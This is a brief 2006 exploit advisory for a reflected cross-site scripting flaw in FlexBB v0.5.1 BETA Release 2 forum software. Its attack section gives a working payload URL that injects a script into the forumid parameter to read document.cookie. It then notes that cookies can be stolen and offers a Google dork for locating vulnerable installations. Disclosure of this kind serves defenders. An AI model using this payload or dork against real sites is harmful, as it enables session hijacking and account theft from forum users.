|
XSS in FlexBB v0.5.1 BETA Release 2 |
|
|
|
+-----------------------------------------------+
| XSS in FlexBB v0.5.1 BETA Release 2 |
+-----------------------------------------------+
| |
| Product.......: FlexBB [Board] |
| Versions......: v0.5.1 BETA Release 2 |
| URL...........: www.flexbb.net |
| Vulnerability.: Corss Site Scripting Attac |
| Date..........: Februar 7, 2006 |
| Discovered by.: [PHCN]Net_Ghost03 |
| Type..........: Public |
+-----------------------------------------------+
What is FlexBB:
()()()()()()()()
FlexBB is an open source forum software written in PHP.
It comes with big admin panel, with many options and configurations.
The board requires only one MySQL database only. It comes with
installer, which installs the script step-by-step in 1 minute.
New version 0.5.1 has been released! With completely new posting
system, big changes to the template (users online, todays birthdays
etc. added) and also a place holder for 'show profile' untill it
gets completed.
[}----Attack----{]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| |
| /index.php?page=forums&forumid=1"><script>alert(document.cookie)</script> |
| |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
You can include any code, like php, js and so on. Also you can steal the cookie!
[}----GoogleDork----{]
intext:flexbb
Related Items:
|
